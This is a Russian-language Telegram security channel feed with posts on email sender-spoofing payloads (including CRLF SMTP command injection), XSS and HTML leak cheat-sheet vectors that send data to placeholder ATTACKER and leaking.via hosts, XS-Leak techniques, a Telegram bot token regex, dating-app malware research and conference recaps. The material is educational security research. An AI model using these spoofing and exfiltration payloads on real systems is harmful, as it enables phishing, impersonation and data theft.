HaHacking – Telegram
HaHacking
1.73K subscribers
50 photos
1 video
10 files
60 links
>> HaHacking Hacking Club;

± Family-friendly канал с доступной информацией — Личный сборник о мире безопасности;
Обработанные знания из разных уголков ИБ 🗂

[security] [pentest] [offense] [defense] [web] [infrastructure]

:~$ @qwqoro
Download Telegram
#заметки #offense

➡️Дополнительно разберёмся в кейсах, описанных в статье @slonser_notes, и в извлекаемом из них импакте!

   🧩   ‟Old new email attacks”   [ 🐍 / 💻 / 💻⚡️


📌 ГЛАВНЫЕ ПОИНТЫ

▪️Пробуйте общаться с почтовыми сервисами по SMTP:
Gmail:     smtp.gmail.com
Outlook: smtp-mail.outlook.com
Yandex: smtp.yandex.ru
Mail.Ru: smtp.mail.ru
...

SSL port: 465
TLS port: 587


▪️Пробуйте разные входные точки:
From: EMAIL
From: <EMAIL>
From: "NAME" <EMAIL>
From: <EMAIL> (COMMENT)
From: GROUP: EMAIL, EMAIL
From: GROUP: <EMAIL>
Sender: EMAIL


▪️Оказались уязвимы почтовые продукты Google, Microsoft, Yandex, ...

▪️Оказались уязвимы парсеры адресов электронных почт, библиотеки ЯП:
    ▪️Python   [email]
    ▪️JS   [addressparser, email-addresses]
    ▪️C#   [System.Net.Mail]
    ▪️Go   [net/mail]
    ▪️Rust, Ruby, PHP, ...


🔑 ПЕЙЛОАДЫ НА ПРОБУ

...➡️...
attacker@[testText\r\nRSET\r\nMAIL FROM: <spoofed@example.org>\r\nRCPT TO: <victim@example.org>\r\nDATA\r\nFrom: spoofed@example.org\r\n\r\nText\r\n.\r\nQUIT\r\n]

📧➡️📧
"Spoofed"
<attacker@outlook.com>: spoofed@outlook.com

📧➡️📧, 📧, ...
<spoofed@gmail.com> "spoofed" <attacker@gmail.com>

📧➡️📧, 📧
Attacker
<spoofed@gmail.com>:<attacker@gmail.com>

📧➡️...
": <attacker@gmail.com> "<spoofed@gmail.com>"



☠️  ИМПАКТ & ПОСЛЕДСТВИЯ

▪️Возможность внедрения конструкции CRLF (\r\n) для внедрения SMTP команд➡️Имперсонация, ...
▪️Некорректный парсинг адреса электронной почты отправителя➡️Имперсонация

❗️Имперсонация➡️(в данном случае) Подделка адреса электронной почты отправителя; Обеспечивает кратное повышение легитимности фишинговых писем в глазах атакуемых


💬 Поскольку вендоры считают перечисленные уязвимости фичами, возможность эксплуатации сохраняет актуальность и уже сейчас мы можем наблюдать, как, например, этими "фичами" начинают пользоваться хактивисты для проведения качественных фишинговых рассылок;


➡️Stay safe.

   @HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
1311
💓 #мероприятия

➡️Напоследок, в завершение серии связанных постов, хотелось бы сказать пару неформальных слов о прошедшем Positive Hack Days 2; 💓

// Чек-лист:
Пережила выступление, да ещё и в самодельном мерче (нарисовано руками краской для ткани, да)! 🔡
[🔗материалы тут ]

Посетила множество крутых докладов (ещё раз спасибо организаторам за организацию, а докладчикам – за их труд и ценный вклад в сообщество!)
[🔗записи докладов тут ]

Обрела новые знакомства, но увиделась не со всеми, с кем хотела увидеться☹️ (@castercanal, очень ждём в следующий раз!)



Огромное человеческое спасибо:
отдельное, особенное спасибо @slonser_notes, мне было приятно работать вместе с тобой! ты крутой!
владельцам каналов: @poxek, @nxblog, @SidneyJobChannel, @bh_cat, @pwnai, @wr3dmast3rvs, @hackthishit, @giftfromtherift, ...
Алексею, Андрею и Петру из VK
моим сокомандникам из ШкИБ Яндекса '23
всем тем, кто был на спикер-пати, на Похек Use After Party и/или на прочих наших посиделках
всем тем, кто слушал наш доклад / поддерживал нас / задавал вопросы / подходил пообщаться
...


💬 Спасибо за то, что сделали эту конференцию такой яркой и насыщенной! Правильно говорят, что человек красит место😊

Была рада познакомиться лично, увидеться и пообщаться со всеми вами!


➡️До новых встреч!

   @HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
217💔1🆒1
🥰 #наработки #defense #reverse #malware #web #mobile

➡️Любовь – это... на самом деле много что, но явно НЕ отправка своих стихов с целью получить удалённый контроль над его смартфоном; 🗝

// Я же упоминала, что мне пригодились полученные знания об анализе вредоносного ПО для Android? 🤔

Не секрет, что с каждым годом проблема одиночества становится всё острее и критичнее, причём настолько, что можно говорить о настоящей эпидемии и это, к сожалению, даже не станет преувеличением. Современное решение – интернет-знакомства, но где технологии – там и новые способы атаковать. Жаль, но злоумышленники обязательно воспользуются любой технической возможностью и сугубо человеческой уязвимостью для достижения своей цели. Чтобы взглянуть на ситуацию поближе, я создала Никиту;


Никите в приложении пришло следующее сообщение:
💬:  Привет) Впервые здесь и ещё не знаю что да как, давай пообщаемся в телеграме мой телеграм ****


💬  Завязался разговор, потом следующий, а в результате.. пришлось полистать вправо, заняться обратной разработкой, анализом вредоносного ПО, отправкой жалоб + написанием статьи:


🧩Свидание с фишингом и стилерами: киберпреступность в эпоху одиночества

⬇️ HaHacking_Dating.pdf ⬇️


➡️Вместе подробно разберём деликатное, двигаясь от простого к сложному; В моём отчёте:

Фишинговый сайт
Мобильный стилер
Мобильный RAT

Прочие виды вредоносных экземпляров
Статистика подобных атак


//   Время чтения: ~40 минут
➡️Enjoy!  🙇‍♂️

@HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
17158🆒22
🥰   #наработки #reverse #malware #web #mobile

➡️Краткое превью анализа вредоносных экземпляров, полная история изучения которых приводится в статье:

   🧩   ‟Свидание с фишингом и стилерами: киберпреступность в эпоху одиночества

⬇️  HaHacking_Dating.pdf ⬇️



✉️ СИТУАЦИЯ №1 [PHISHING]

📍 Из чат-бота для знакомств
Веб-приложение, "Драматический театр"
❗️ Фишинг с кражей платёжной информации

Обзор интерфейса сайта, который внушает пользователю иллюзию легитимности, и функциональности, которая обеспечивает сбор платёжной информации атакуемого;

// Тут же был обнаружен сюрприз – интерфейс по пути /generate, в котором любезно оставлена инструкция мошеннической схемы 🐇



💸 СИТУАЦИЯ №2 [STEALER]

📍 Из приложения для знакомств
Мобильное приложение, "Знакомства 18+"
❗️ Стилер банковских SMS с элементами RAT и вымогательства
Извлечение из мобильного приложения, которое было создано с помощью Tasker, XML файла с данными и его импорт в Tasker в качестве проекта для комфортного изучения функциональности;

Несколько режимов работы (стилер SMS и файлов, рассылка спама, шантаж, RAT)
Триггер на банковские номера
Обнаружение отладки и общение с C&C сервером
Уведомления в Telegram боте
. . .

💬 В отчёте показываю каждый вредоносный модуль и рассказываю, что это за (местный) зверь такой;



🐭 СИТУАЦИЯ №3 [RAT] ⚡️

📍 Из чат-бота для знакомств
Мобильное приложение, "Стриминговый сервис"
❗️ RAT, удалённое управление заражённым устройством
Моё лучшее предположение, исходя из собранных данных, – что мне на анализ попался представитель CraxsRAT;

CraxsRAT представляет из себя наиболее свежего наследника CypherRAT, SpyNote и SpyMax. Он вобрал в себя многообразие функций, включая, например:
   Автозапуск
   Обнаружение отладки
   Управление файлами
   Управление камерой
Управление микрофоном
Управление SMS и звонками
Отслеживание локации
   Управление прикосновениями
   Инъекции в WebView
   . . .

💬 В статье показываю образцы кода, отвечающие за каждую функцию, и рассказываю, что это за (иностранный) зверь такой;



🌳 ПРОЧИЕ СИТУАЦИИ

🔗 Другие варианты фишинга
🔗 Zscaler: ‟Album Stealer➡️кража данных из браузеров
🔗 eSentire: ‟OnlyDcRatFans➡️DcRAT
🔗 Zscaler: ‟Steal-It Campaign➡️кража информации о системе



//   Читать полностью... 😥
➡️Enjoy! 

   @HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
7217🆒32
®️  #мероприятия #заметки #offense #defense #infrastructure #web #mobile #ai

➡️На канале OFFZONE в VK Видео выложили записи докладов с прошедшей конференции OFFZONE;  В этот раз список докладов, запавших мне в сердце, достаточно обширный, что не может не радовать😊 Рекомендую Вам к просмотру!

   🧩   Канал  ‟OFFZONE



🎲  INFRASTRUCTURE

   ⭐️  ‟Pentest FreeIPA, или Углубляемся в зоопарк” (Михаил Сухов)
Внутреннее устройство FreeIPA и характерные уязвимости;


   ⭐️  ‟Вредоносное ПО и закрепление в системе: как злоумышленники взламывают Windows?”  (Жасулан Жусупов)
Нестандартные методы сохранения вредоносного ПО с помощью модификаций реестра и подмены DLL в Windows Internet Explorer, Win32 API Cryptography, Windows Troubleshooting, Microsoft Teams (исправлено в 2024 году) и Process Hacker 2 (исправлено в v3);



⚙️ HARDWARE

   ⭐️  ‟Угнать за 5 СМС: история об RCE в модемах Telit” (Александр Koзлов + Сергей Ануфриенко)
Уязвимости модемов Telit, позволяющие удаленно выполнить произвольный код, обход проверки цифровой подписи, активация Over The Air Provisioning (OTAP) и установка на модем собственного мидлета с привилегиями производителя;


   ⭐️  ‟MPoS'tor: компрометация мобильного PoS‑терминала”  (Георгий Хоруженко)
Анализ системы offline‑оплаты, метод удаленной компрометации мобильного терминала (посредством протокола Bluetooth) и перехват данных платежных карт пользователей;



💸  BUG BOUNTY

   ⭐️  ‟Больше никакой халявы! Интересные баги в e‑food‑приложениях”  (Егор Тахтаров)
Баги, найденные в программах вознаграждения у вендоров, основная сфера деятельности которых — e‑grocery;


   ⭐️  ‟Bug bounty: простые критические баги”  (Алексей Лямкин)
Как небольшие ошибки могут привести к критическим для бизнеса угрозам;


   ⭐️  ‟From source maps to secrets”  (@pentest_notes)
Разработчики все чаще стали оставлять открытые source maps в своих веб‑приложениях. Благодаря этому любой пользователь может просмотреть исходный код в его первозданном виде. Что же могло пойти не так?



💓  А ЕЩЁ

   ⭐️  [#MOBILE]  (@mobile_appsec_world)
Безопасность мобильных приложений: что нового в 2024 году?
Наиболее значимые уязвимости и новости в мобильной безопасности: новые векторы атак, классные баги и ошибки, найденные в приложениях за последние полгода;


   ⭐️  [#AI]  (@hackthishit + Руслан Махмудов)
тRAGедия LLM. Эксплуатируем бэкдоры в базе знаний RAG
Архитектура RAG в LLM, основные векторы атак через внедрение вредоносного документа и способ их оптимизации;


   ⭐️  ‟Pentester's tales”  (Михаил Дрягунов)
О звонках спамеров после посещения сайта, о расшифровке BitLocker с помощью логического анализатора, и о том, как получить RCE на кассе самообслуживания, просканировав пару штрихкодов;

      ...


💮  + HONORABLE MENTION

   ⭐️  ‟Гори, гори ясно, чтобы не погасло. Выгорание как тренд современной ИБ”  (🌚 @poxek + @bughunter_omsk)

   >💬 Я, признаться, не фанат разговоров "обо всём и ни о чём" и считаю, что техническая конференция должна состоять из технических докладов. Тем не менее, доклад Сергея и Артема, благодаря их настрою и выбранному формату открытого и искреннего диалога с залом, стал островком для отдыха в череде технохардкора, даже несмотря на то, что поднял не самую приятную тему для разговора. Ребята помогли задуматься о важной проблеме, не нагнетая и не уча, а просто поговорив по душам; Спасибо вам за то, что сделали это


И, конечно, спасибо организаторам и участникам OFFZONE за то, что он был таким!

➡️Приятного просмотра!

   @HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
10105🎃2💔1
💎  #литература #заметки #infrastructure #offense #defense

➡️Если Вас интересует всё то, что относится к нижней половине модели OSI, у меня появился повод вспомнить про сети во всей их низкоуровневой красоте; ⚡️


📖 Мой хороший друг, высококлассный специалист @castercanal выпустил книгу, которая содержит 12 его работ для журнала @xakep_ru, дополняет серию материалов “Глазами хакера” и рассказывает о безопасности сетей;

     🧩   Caster:  “Сети глазами хакера

[ ТЕМЫ ]:   Взлом DTP  /  Побег в другую сеть VLAN  /  Пентест канального уровня сети  /  Пентест Ethernet  /  Пентест сетей Cisco  /  Защита сетей от спуфинг-атак  /  Защита сетевого оборудования на примере Cisco IOS  /  Пентест MikroTik  /  Защита MikroTik  /  Использование провайдерских протоколов для пивотинга  /  Использование виртуального MikroTik для постэксплуатации Windows  /  Закаляем Kali Linux и не шумим в сети  /  Пентест сетей с наименьшим ущербом;



🔖 В честь этого прилагаю компиляцию полезных материалов по сетям, которая включает в себя ресурсы, созданные / рекомендованные автором книги для всех, кого интригуют сетевые технологии:  ⬇️

     🧩   casterbyte/NetworkNightmareMind map по атакам на сетевые протоколы;

Traffic Hijacking  /  MiTM Attacks  /  Dynamic IGP Routing  /  Configuration Exfiltration  /  DoS  /  NAC/802.1X Bypassing  /  GRE Pivoting  /  Cisco EEM for hiding user  /  Authentication Cracking  /  Information Gathering  /  Cisco Passwords  /  VLAN Bypassing;


     🧩   casterbyte/MITMonsterCheat sheet по MITM-атакам;

▪️[L1]  Croc-in-the-middle  (@s0i37_channel)
▪️[L2]  ARP Cache Poisoning, LLMNR/NBT-NS/mDNS Poisoning, STP Root Spoofing, DHCPv4 Spoofing, DHCPv6 Spoofing;
▪️[L3]  Evil Twin against Dynamic Routing, FHRP Spoofing;


     🧩   Курс молодого бойца  (NetSkills)

[Cisco Packet Tracer]  Простейшая сеть  /  Коммутатор  /  Основы Cisco IOS  /  VLAN  /  STP  /  EtherChannel  /  L3 коммутатор  /  Маршрутизатор  /  Статическая маршрутизация  /  DHCP  /  NAT  /  OSPF  /  EIGRP  /  Access-List  /  Cisco ASA  /  DMZ  /  VPN  /  Syslog, NTP  /  AAA  /  TFTP  /  WiFi;


     🧩   Серия статейСДСМ  (LinkMeUp)

Коммутация  /  Статическая маршрутизация  /  STP  /  NAT и ACL  /  Динамическая маршрутизация  /  VPN  /  BGP и IP SLA  /  IBGP  /  Мультикаст  /  Базовый MPLS  /  MPLS L3VPN  /  MPLS L2VPN  /  MPLS EVPN  /  EVPN Multihoming  /  MPLS Traffic Engineering  /  Путь пакета  /  QoS  /  ECMP  /  Балансировка в датацентрах  /  Сети современных датацентров  /  Чипы и буферы;


     🧩   Материалы Сетевой академии Netacad  (Cisco)

Digital Essentials  /  Networking  /  Cybersecurity  /  Programmable Infrastructure  /  Packet Tracer;  [CCNA, CCNP] [#IoT]



➡️ Приятного чтения!

   @HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
8🆒53🎃11
⚙️ #заметки #offense #web


➡️Cheat sheet по безопасности HTML5; (*от создателей DOMPurify)

   🧩 cure53/H5SC 💻 🧩 html5sec.org


▪️ [ html5sec.org/test/#<1...149> ]

Для каждого из почти 150 приведённых векторов XSS атак существует демо-стенд, где можно отредактировать полезную нагрузкупонаблюдать за её поведением внутри iframe'ов с различными DTD (HTML5, HTML4, XHTML);

▪️ [ html5sec.org/test.<ext> ]

Примеры файлов, содержащих полезную нагрузку для вызова alert(1), со следующими расширениями:
asf, avi, class, css, dtd, eml, evt, gif, hlp, hta, htc, html, jar, js, json, mpeg, pdf, sct, noscript, swf, vbs, vml, wbxml, xbl, xdr, xml, xsl, xxe, zip


▪️vectors.txt Словарь с примерами пейлоадов для каждого вектора XSS атаки;



➡️Список примеров HTML элементов, которые могут инициировать запросы к ресурсам; (*тоже от создателей DOMPurify)

Может быть полезен как памятка для составления полезной нагрузки для эксплуатации возможности внедрения HTML кода: для реализации OOB запросов и эксфильтрации данных;

Или как чеклист для проверки, как там поживает Ваша анонимность, ведь именно по такому принципу работают, например, пиксели-трекеры в электронных письмах🐇

   🧩 cure53/HTTPLeaks


▪️ vectors.txt Список с примерами пейлоадов; Вот, например, несколько включений из него:
...
<img dynsrc="https://leaking.via/img-dynsrc">
<img lowsrc="https://leaking.via/img-lowsrc">
<video controls><source src="https://leaking.via/video-source-src" type="video/mp4"></video>
<style>@import url(https://leaking.via/css-import-url);</style>
<noscript version="1.1" xmlns="http://www.w3.org/2000/noscript"><rect cursor="url(https://leaking.via/noscript-cursor),auto" /></noscript>
<xml src="https://leaking.via/xml-src" id="xml"></xml>
<math xlink:href="https://leaking.via/mathml-math">CLICKME</math>
...


▪️ Несколько примеров из реальной жизни:
[Chrome]  Leak user html content using Dangling Markup injection when http upgrade to https

▪️ЧТО:       <img src="http://ATTACKER/?q=
▪️КОГДА:   HTTP➡️HTTPS для http://ATTACKER
▪️ИТОГ:      утечка содержимого страницы


[Proton]  User IP address leaked on email open

▪️ЧТО:       <noscript><style>circle { background-image: url(https://ATTACKER/200); }</style><circle></circle></noscript>

▪️КОГДА:  при открытии письма
▪️ИТОГ:      утечка IP адреса


[macOS]  This man thought opening a txt file is fine, he thought wrong

▪️ЧТО:
ℹ️ <!DOCTYPE HTML><html><head></head><body><style>@import{ "file:///net/ATTACKER/a.css"}</style></body></html>
ℹ️ <iframedoc src="file:///etc/passwd">

▪️КОГДА:  при открытии TXT файла в TextEdit
▪️ИТОГ:      DoS (например, подтянуть /dev/zero), утечка IP адреса + содержимого локальных файлов (*объединить пейлоады)


[MS Outlook]  SMB hash hijacking & user tracking

▪️ЧТО: <v:background xmlns_v="urn:schemas-microsoft-com:vml"><br><v:fill src="<strong>its:/ATTACKER/IDontExistNew/foobar</strong>"></v:fill><br></v:background>

▪️КОГДА:  при открытии письма
▪️ИТОГ:  внешние SMB / WebDAV запросы



@HaHacking 🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
158🎃82
⚙️   #заметки #offense #web

Не отходя от Client-Side атак, захотелось-таки сохранить здесь материалы по XS-Leaks / Cross-Site Leaks; :)

➡️"Библии":

   🧩   xsleaks/xsleaks  💻  🧩   xsleaks.dev

   🧩   [OWASP] Cross-site leaks Cheat Sheet


➡️Дополнения:

Introduction to Cross-Site Leaks
XS-Leaks Attacks and Prevention
[PortSwigger]  Latest cross-site leak news

xsinator.com
▪️testing.html тест браузера на уязвимость к 38 векторам XS-Leaks;


➡️Любопытные дополнения:

From XS-Leaks to SS-Leaks Using object

"SameSite: Lax" cookie затрудняют эксплуатацию XS-Leaks. Но если веб-приложение уязвимо к HTML Injection, можно воспользоваться идеей XS-Leaks для проведения похожей boolean-based атаки (SS-Leaks / Same-Site Leaks) и извлечения информации от лица атакуемого пользователя;

▪️ <iframe> обновляет своё содержимое вне зависимости от кода ответа
▪️ <object> НЕ обновляет своё содержимое при 404


▪️HTML Injection без особой CSP:

[ Результаты ]

➡️ Есть запрос к ATTACKER/api/v1/leaky?secret=a вернул 404
➡️ Нет запроса к ATTACKER/api/v1/leaky?secret=a вернул 200

<object data="/api/v1/leaky?secret=a">
<object data="https://ATTACKER?callback=a">
</object>
</object>


▪️HTML Injection в видимой областиCSP блокирует внешние объекты:

[ Пример CSPРезультаты ]

Content-Security-Policy: default-src 'self'; img-src *;

➡️ Есть запрос к ATTACKER/api/v1/leaky?secret=a вернул 404
➡️ Нет запроса к ATTACKER/api/v1/leaky?secret=a вернул 200

<object data="/api/v1/leaky?secret=a">
<img src="https://ATTACKER?callback" loading="lazy">
</object>


▪️HTML Injection НЕ в видимой областиCSP блокирует внешние объекты:

[ Результаты ]

➡️ Запрос с callback=0/api/v1/leaky?secret=a вернул 404
➡️ Запрос с callback=1/api/v1/leaky?secret=a вернул 200

<object data="/api/v1/leaky?secret=a">
<iframe srcdoc="<img srcset='https://ATTACKER?callback=1 480w, https://ATTACKER?callback=0 800w' sizes='(min-width: 1000px) 800px, (max-width 999px) 480px'>" width="1000px">
</object>



   @HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
272157🎃3
🍃🌼 #наработки #offense #iot #web 🌼🍃

➡️СтатьяПрезентация с Хакерского митапа SPbCTF x Yandex / История о black-box анализе защищённости необычного IoT устройства:


   🧩   ‟Plants vs. Bugs: пентест умного цветочного горшка

   ⬇️  HaHacking_Plants-vs-Bugs.pdf  ⬇️


Исследуем и раскроем проблемы безопасности умного цветочного горшка через изучение самых разнообразных входных точек вдоль стека OSI, рассмотрев в комплексе интерфейсы, окружающие устройство умного дома и включенные в него:

от сенсоров до веб-приложения
от порта локального контроля до мобильного приложения

▪️Сетевые атаки
▪️Evil Twin через Deauthentication атаку
▪️Имперсонация клиента
▪️Имперсонация сервера обновлений

▪️Уязвимости веб-приложения
▪️Broken Access Control (дефейс, нарушение работы)
▪️Time-based сканирование LAN
▪️Improper Input Validation (чтение / запись в память, кража чувствительных данных)

▪️Управление через расширенный API
▪️Эмуляция нажатий
▪️Mass Assignment (подмена неизменяемых параметров, Open Redirect в мобильном приложении)


🍃🌸 Читать полностью... 🍃

//   Время чтения: ~20 минут
➡️Enjoy!  💐

   @HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
35197🎃3
🚀  #мероприятия #наработки #defense #reverse #malware #web #mobile

➡️Вспоминая моё исследование вредоносного ПО, нацеленного на русскоговорящую аудиторию и распространяющегося через сервисы знакомств, прикрепляю слайды связанного доклада, презентованного мной на Security Analyst Summit 2024, организованном Лабораторией Касперского!


Статья, на которой был основан доклад:
🧩Свидание с фишингом и стилерами: киберпреступность в эпоху одиночества

⬇️ HaHacking_Dating-RU.pdf


Сами слайды презентации:  ⬇️
🧩Love Hack You to the Moon and Back: Cybercrime in the Age of Loneliness

   ⬇️  HaHacking_Dating.pdf



➡️Внутри:
0️⃣ Not a long time ago in a galaxy not that far away
Введение о проблеме: о том, почему тема отношений – золотая жила для злоумышленниковмоя фейковая личность;

Loneliness Epidemic
Dating apps
Gender imbalance
Fake identity


1️⃣ Orbital objects
Анализ вредоносных экземпляров: источники ВПОосновная функциональность;

Case 1: Phishing
Case 2: Stealer
Case 3: RAT


2️⃣ Hitchhikers & Stranger danger
Немного про анонимность в сети: преимущества и угрозысохраняющиеся способы идентификации;

3️⃣ Observatory observations
Статистика атак на пользователей и дейтинговые сервисы, тренды и тенденциидругие проблемы безопасности;



➡️Пара слов про сам Security Analyst Summit 2024: невероятно круто!

Одна из самых продуманных конференций. В каждой детали легко читался колоссальный труд, вложенный в организацию мероприятия;

Обязательно берите на заметку, спикеры и CTF'еры!


➡️Thanks for having me! Stay safe, xx

   @HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
22751
🔓 #заметки #malware #defense

➡️В процессе анализа малвари в сфере Интернет-знакомств обратила внимание на несколько сервисов, которые представляют из себя базы известных специалистам сведений о встречающемся вредоносном ПО для упрощения задачи поиска информации / примеров для анализа;

    🧩  Malware Bazaar: bazaar[.]abuse[.]ch
   🧩  MalShare: malshare[.]com
   🧩  AnyRun: app[.]any[.]run
   🧩  UnpacMe: unpac[.]me
   🧩  Triage: tria[.]ge

▪️ Поиск по хешам
▪️ Поиск по тегам
▪️ Идентификаторы компрометации
▪️ Классификация угроз
▪️ Результаты анализа антивирусами
▪️ YARA правила
▪️ Правила для уведомления
▪️ Доп. заметки тех, кто поделился


🧩  vx-underground (vx-underground[.]org) – коллекция исходного кода, экземпляров и исследований;

🧩  Global ATM Malware Wall (atm[.]cybercrime-tracker[.]net) – база сведений о ВПО, нацеленном на ATM;


❗️ Создание / использование / рас­простра­нение вредоносного ПО и наруше­ние работы сис­тем прес­леду­ются по закону.

Будьте благоразумны и занимайтесь исключительно анализом ПО, не выходя за рамки собственной песочницы.



   @HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
111🎄1
✉️   #заметки #инструменты

➡️В процессе анализа малвари в сфере Интернет-знакомств мне в руки попал токен Telegram бота злоумышленников; Очевидно, что этот недочёт открыл передо мной, как специалистом по другую сторону баррикад, целый спектр возможностей для управления ботом;

Но кроме того, нашла инструмент для автоматизации выгрузки информации из Telegram бота с использованием слитого токена, на случай, если окажетесь в схожей ситуации:

   🧩  soxoj/telegram-bot-dumper

Имя связанного бота;
Информация о боте;
История сообщений чатов;
Медиа из чатов;
Информация о пользователях, запустивших бота;


▪️Примерный regex для таких токенов:
[0-9]{6,10}:[a-zA-Z0-9_-]{34,35}


▪️Места, где их часто оставляют:
telepot.Bot(TOKEN)
telegram.Bot(TOKEN)
telebot.TeleBot(TOKEN)
ApplicationBuilder().token(TOKEN)

new Bot<Context>(TOKEN)
new TelegramBot(TOKEN)
new TelegramApi(TOKEN)
new Telegram(TOKEN)
new Telegraf(TOKEN)
new TeleBot(TOKEN)
new TgLog(TOKEN)

Telebot::Client.new(TOKEN)
Telegram::Bot::Api.new(TOKEN)
Telegram::Bot::Client.new(TOKEN)
Telegram::Bot::Client.run(TOKEN) do |bot|

tgbotapi.NewBotAPIWithClient(TOKEN)
tgbotapi.NewBotAPI(TOKEN)
tg.NewBotAPI(TOKEN)

f"https://api.telegram.org/bot{TOKEN}/METHOD"
"https://api.telegram.org/bot" . TOKEN . "/METHOD"
"https://api.telegram.org/bot" + TOKEN + "/METHOD"
URI.parse("https://api.telegram.org/bot#{TOKEN}/METHOD")
String.format("https://api.telegram.org/bot%s/METHOD", TOKEN)



➡️Вот, кстати, подобная история от исследователей из Checkmarx; Они подробно описали, как извлекли API токен для Telegram бота злоумышленников из вредоносного пакета и таким образом получили доступ к их каналу связи:

   🧩  ‟How We Were Able to Infiltrate Attacker Telegram Bots

Извлечение API токена и ID чата;
Извлечение истории сообщений;
Перехват новых сообщений;
Нарушение работы бота злоумышленников;


▪️Скрипт, который был использован для пересылки сообщений (message_id = 1..2000) из бота злоумышленников в бот исследователей:

1..2000 | ForEach-Object { Invoke-WebRequest -Uri "https://api.telegram.org/bot{attacker_Bot_Token}/forwardMessage" -Method POST -ContentType "application/json" -Body ('{"from_chat_id":"{attacker_chat_id}", "chat_id":"{my_chat_id}", "message_id":' + $_ + '}') }



   @HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
231243🎄1
🗂 #заметки #offense #web

➡️Полезный репозиторий на случай тестирования функциональности загрузки файлов – сборник маленьких, но синтаксически валидных файлов самых разных форматов, готовых для встраивания в них Ваших пейлоадов:

   🧩 mathiasbynens/small

▪️Краткий список расширений:
adb, appcache, avi, awk, bat, bf, bmp, bpg, bz2, c, chicken, chm, class, clj, cljc, cljs, clp, cob, coffee, com, cpp, cr, cs, css, dcm, dol, e, ex, exe, f, f90, flv, gif, go, groovy, gz, h, heif, hs, html, i, i7x, icc, ico, inf, java, jp2, jpg, js, json, jsonp, jxl, lua, m, macho, macho-ml, malbolge, md, ml, mng, mp3, mp4, ni, nim, o, opa, pas, pbm, pdf, pgm, php, pl, pml, png, ppm, py, rar, rb, rs, rtf, scala, sh, noscript, swf, swift, t, tar, tga, tif, toml, ts, vs, wasm, wav, webm, webp, wmf, wmv, ws, xbm, xhtml, xml, yml, zip


▪️Полный список форматов:
ada.adb, manifest.appcache, AudioVideoInterleave.avi, awk.awk, batch.bat, brainfuck.bf, bmp.bmp, bpg.bpg, bzip2.bz2, c.c, chicken.chicken, compiledhtml.chm, java-class.class, clojure.clj, clojure.cljc, clojurenoscript.cljs, jess.clp, cobol.cob, coffeenoscript.coffee, doscommand-empty.com, doscommand.com, cpp.cpp, crystal.cr, csharp.cs, css.css, dicom.dcm, dolphin.dol, eiffel.e, elixir.ex, dosexecutable.exe, linearexecutable.exe, newexecutable.exe, portableexecutable-xp.exe, portableexecutable.exe, fortran-77.f, fortran-90.f90, FlashVideo.flv, gif-transparent.gif, gif.gif, go.go, groovy.groovy, gzip-name.gz, gzip.gz, c.h, heif.heif, haskell_loop.hs, haskell_term.hs, html-2.0.html, html-3.2.html, html-4.0-strict.html, html-4.01-frameset.html, html-4.01-strict.html, html-4.01-transitional.html, html5.html, iso-html.html, xhtml-1.0-frameset.html, intercal.i, i.i7x, icc.icc, ico.ico, inform-6.inf, java.java, jpeg2.jp2, jpeg.jpg, javanoscript.js, json.json, json-p.jsonp, jxl.jxl, lua.lua, objective-c.m, macho, macho-ml, malbolge.malbolge, markdown.md, ocaml.ml, mng.mng, mp3.mp3, Mpeg4.mp4, mp4-with-audio.mp4, story.ni, nim.nim, elf.o, opa.opa, pascal.pas, pbm.pbm, pbmb.pbm, pdf.pdf, pgm.pgm, pgmb.pgm, php.php, perl.pl, promela.pml, png-transparent.png, png-truncated.png, ppm.ppm, ppmb.ppm, python.py, rar14.rar, rar4.rar, rar5.rar, ruby.rb, rust.rs, rtf.rtf, scala.scala, shell.sh, noscript.noscript, flash.swf, swift.swift, tads-3.t, tar.tar, targa.tga, tiff.tif, toml.toml, typenoscript.ts, vertex-shader.vs, webassembly.wasm, wav.wav, webm.webm, webp.webp, WindowsMetafile.wmf, WindowsMediaVideo.wmv, whitespace.ws, x-bitmap.xbm, xhtml-1.0-strict.xhtml, xhtml-1.1.xhtml, xhtml-basic-1.0.xhtml, xhtml-basic-1.1.xhtml, xhtml5.xhtml, xml-1.0-valid.xml, xml-1.0.xml, xml-1.1-valid.xml, xml-1.1.xml, yaml.yml, zip.zip



Полезный репозиторий на случай тестирования такой функциональности (и браузеров) на уязвимость к Denial-of-Service – большая картинка PNG формата минимального размера;

   🧩 korczis/big-png
🧩  bamsoftware.com/hacks/deflate

▪️PNG изображение 6_132_534 байта (5.8 Мб)
▪️225_000 × 225_000 пикселей
▪️при представлении в качестве буфера пикселей по 3 байта / пиксель➡️141.4 Гб



@HaHacking 🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
1543
🎄  #события #заметки #web #infrastructure #offense #defense #devsecops #forensics #malware #ai

➡️И вновь от лица HaHacking поздравляю каждого из вас с уже наступившим Новым годом (кстати, змеи 🐍)! 🔔⭐️


⭐️ Оффенсивам — желаю с завидной лёгкостью отловить ещё больше уязвимостей вперёд коллег, захватить ещё больше Domain Admin'ов и добиться исполнения кода даже там, где кажется, что получится зарепортить один только CSRF!

Дефенсивам
— надёжных паролей и непробиваемых настроек безопасности, получать столько баг-репортов, сколько нужно для совершенствования, и пусть ни один из них не заведётся в инцидент!

Всем нам — только положительных результатов от нашей работы, ещё больше поучительных дисклоузов, прорывных ресерчей, поводов встретиться и обсудить безопасность в новом году! И, конечно, всего общечеловеческого: радостных событий и запоминающихся моментов, сил и уверенности в завтрашнем дне, родных и близких рядом;


🎁  И вновь – символический подарок: ⬇️

   🧩  qwqoro.works/new-year-2024 ⚡️


🏠 Собрала ~2⁶ статей, которые были для меня любопытны и были выпущены в только что окончившемся 2024 году; Организовала для них небольшую галерею из 5 залов:

WEB_2 [WEB + MOBILE]
INFRA [REDTEAM + NETWORK]
WEB_3
THREATS [DEFENSE + TI]
AI + IOT

✍️Кратко описала каждую статью в карточках под картинами ‼️

